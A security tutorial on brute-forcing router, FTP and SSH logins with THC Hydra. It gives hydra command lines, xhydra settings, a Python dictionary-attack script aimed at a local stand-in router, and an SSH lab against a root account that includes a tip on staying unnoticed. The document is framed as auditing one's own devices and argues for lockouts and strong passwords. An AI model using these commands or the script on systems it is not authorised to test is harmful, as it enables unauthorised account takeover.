Leaving your wireless router at its default settings is a bad idea, and sadly most people still do it. Once an attacker has a foothold on your network, the router’s admin interface is the first thing they go after: by changing its settings they get an easy way back in, and they can turn the router into a proxy so their traffic to other targets appears to come from you. With the router at its defaults, an attacker controls your firewall rules, which ports are forwarded, and more.
But never mind the hackers, what about your kids?
In this Null Byte, we’re going to take a hack at our own wireless routers to see just how secure they really are. We’ll be using Arch Linux and THC Hydra, a brute-forcing tool. Windows users, you can follow along if you use Cygwin.
Step 1: Download & Install Hydra
First we need to go to the Hydra website, download Hydra, and get everything configured. In this article, a “cmd” refers to a command that has to be entered into a terminal emulator.
- Download Hydra from THC’s website.
- Extract Hydra in a nice location. cmd: tar zxvf hydra-7.1-src.tar.gz
- Change to the newly made directory.
Step 2: Use Hydra on Your Router
Now we’re going to attack our own routers. On most home routers the admin interface is at 192.168.1.1 (some use 192.168.0.1), so open that address in a browser to confirm it. If the browser pops up a username/password dialog box rather than an HTML login page, you’ve reached your router and it is using HTTP Basic authentication, which is exactly what Hydra’s http-get module attacks. (A router that shows an HTML form instead needs Hydra’s http-post-form module, which is outside the scope of this article.)
Commands & Configuration
- cmd: xhydra
- Enter 192.168.1.1 as your target.
- Use http-get as the method.
- Port 80.
- Pick a word list saved on your computer.
Congratulations! See how easy it can be? Most consumer routers never rate-limit or lock out failed logins, so someone could brute-force you for days on end. Change your password to something longer than 12 characters, and change the default username too if the router allows it, since most routers ship with a well-known default username and password. You can get an overview of all Hydra’s options with “man hydra” (in a terminal).
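Here is what the http-get module is actually doing on the wire, as an added example (not code from this article or from THC Hydra). It is written in Python rather than as a hydra invocation so it runs offline: a stand-in router, hypothetically named FakeRouterHandler, answers Basic-auth challenges on localhost, and the attack loop mirrors “hydra -l admin -P wordlist -f <router> http-get”, including the -f behaviour of stopping after the first valid pair. The credentials, the port and the wordlist are all constructed for the demo. The attempt counter on the fake router makes the point above concrete: nothing stops the attacker after five, fifty or five thousand wrong passwords.

```python
"""Dictionary attack on HTTP Basic auth, the way hydra's http-get module works.

Added example, not from the original article or from THC Hydra. The target is
a stand-in for the router: a local HTTP server (hypothetical name
FakeRouterHandler) that protects "/" with Basic auth, so everything runs
offline. Credentials, port and wordlist are constructed for the demo.
"""
import base64
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed "router" credentials: what the attacker is trying to recover.
ROUTER_USER = "admin"
ROUTER_PASS = "password1"


class FakeRouterHandler(BaseHTTPRequestHandler):
    """Stand-in for a router admin page protected by HTTP Basic authentication.

    Like most consumer routers it never rate-limits or locks out: every request
    is answered, so a brute-force can run for as long as the attacker likes.
    """
    attempts = 0  # class-level counter shared by all requests

    def do_GET(self):
        type(self).attempts += 1
        expected = base64.b64encode(f"{ROUTER_USER}:{ROUTER_PASS}".encode()).decode()
        if self.headers.get("Authorization") == f"Basic {expected}":
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"<html>Router admin</html>")
        else:
            # The challenge a browser turns into the username/password dialog.
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="Router"')
            self.end_headers()

    def log_message(self, *args):
        pass  # keep the demo quiet


def start_fake_router():
    """Bind to an ephemeral localhost port and serve in a daemon thread."""
    server = HTTPServer(("127.0.0.1", 0), FakeRouterHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def try_basic_auth(host, port, user, password, path="/"):
    """One login attempt: GET with an Authorization: Basic header.

    A 401 is the server rejecting the credentials; anything else (a 2xx page,
    or a redirect into the admin UI) means they were accepted.
    """
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request("GET", path, headers={"Authorization": f"Basic {token}"})
        status = conn.getresponse().status
    finally:
        conn.close()
    return status != 401


def http_get_attack(host, port, user, wordlist, stop_on_first=True):
    """Equivalent of: hydra -l USER -P wordlist -f HOST http-get /

    Returns the list of (user, password) pairs the server accepted.
    """
    found = []
    for candidate in wordlist:
        if try_basic_auth(host, port, user, candidate):
            found.append((user, candidate))
            if stop_on_first:  # hydra -f: quit after the first valid pair
                break
    return found


# Constructed wordlist standing in for the file you would pass to -P.
WORDLIST = ["admin", "1234", "letmein", "password", "password1", "changeme"]

if __name__ == "__main__":
    router = start_fake_router()
    port = router.server_address[1]
    hits = http_get_attack("127.0.0.1", port, "admin", WORDLIST)
    print("valid credentials:", hits)
    print("requests answered without any lockout:", FakeRouterHandler.attempts)
    router.shutdown()
```

Run it and the fake router gives up the password on the fifth request; swap the handler for one that returns 429 after a few failures and http_get_attack stalls, which is the whole argument for a lockout or rate limit on the admin page.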
Before choosing a service to attack, scan the router for open ports with the following command: “nmap 192.168.1.1” (substitute your router’s IP address). I will use FTP here. Now, run the following command: “hydra -l admin -P password.txt -v -f 192.168.1.1 ftp”
Explanation of the command:
“-l” gives the login username; my default is “admin.” You can use “-L” with a text file of usernames if you don’t know your router’s admin username. “-P” gives the password list. “-v” turns on verbose mode (use “-V” to print every login/password attempt as it is made). “-f” tells Hydra to quit as soon as it finds one valid username and password pair.
“192.168.1.1” is my router’s configured IP address. “ftp” is the service (the open port) I am attacking; you can also use “http-get” and others. Now wait and watch: if Hydra finds a working login and password pair, it prints it on the screen. Hydra supports many services, and the same approach works for cracking logins on any of them.
Hydra is a popular password cracker that can be used against the logins of many services, such as HTTP, FTP, and Telnet. Most home internet connections go through a router that has an HTTP admin interface. Try typing 192.168.0.1 or 192.168.1.1 into a web browser and see whether an authentication prompt is issued.
If it is, the prompt almost certainly comes from your router. The router’s web interface is where you configure port forwarding for torrents or for multiplayer online games such as AOE. If you do not know your router’s password, recovering it with Hydra is easy.
For example, if the router’s web interface is on 192.168.0.1, the command is the same as the FTP one above with 192.168.0.1 as the target and http-get as the service. Here password.lst is the wordlist of passwords to try and admin is the username being tested; usernames can also be brute-forced with the -L option.
Hydra (better known as “thc-hydra”) is an online password attack tool: it tries username/password combinations against live services such as telnet, ssh, http, https, smb, snmp, and smtp. Hydra supports 30+ protocols, including their SSL-enabled variants, and drives the attack from the user lists and wordlists you specify.
Hydra works in four modes, depending on how you supply the credentials:
- One username and one password (-l user -p pass)
- User list and one password (-L users.txt -p pass)
- One username and password list (-l user -P passwords.txt)
- User list and password list (-L users.txt -P passwords.txt)
Pentesters use this tool to audit the password strength of live services, typically where credentials cannot be captured by sniffing. xHydra, the GUI front end, can be opened from the Kali Linux menu or by running xhydra in a terminal. Its tabs are:
Target – Settings for the target: host or host list, port, and protocol.
Passwords – Username and password options, including wordlists.
Tuning – How fast Hydra should work (number of parallel tasks) and other timing options.
Specific – Options for particular protocols, such as an HTTP URL, a domain, or an HTTPS proxy.
Start – Start/stop the attack and view the output.
Breaking SSH with a wordlist attack – Hydra
In this lab we try to break SSH authentication on a remote host with the IP address 192.168.0.103. We run a wordlist attack, using a list of the most common passwords, against the root account.
Step 1: Open thc-hydra
Step 2: Set Target & protocol in the target table
Step 3: Set the username to root and specify the location of a wordlist in the Passwords tab. Much larger wordlists, ranging up to 3 GB or more, are available online; a few minutes of searching will turn them up.
Step 4: Set the number of tasks to 1 in the Tuning tab. A single connection at a time is slower, but it generates less traffic and is less likely to be noticed; it also matters where the SSH server throttles or locks accounts after a burst of failed logins, since a flood of parallel attempts would trigger that immediately.
Step 5: Start the thc-hydra from Start tab.
Step 6: Scroll down and wait until the password is found.
THC Hydra is an easy-to-use tool with a GUI for those who prefer not to work at the command line, and it handles brute-force and dictionary attacks against more than 30 protocols.
Other common remote-authentication attack tools are Medusa and Ncrack. They do the same job as THC Hydra and can also be downloaded online; speed comparisons show all three finishing in roughly similar times, with Hydra ranking first mainly because it supports the most protocols. THC Hydra is a solid choice for a brute-force or dictionary attack against a remote authentication service.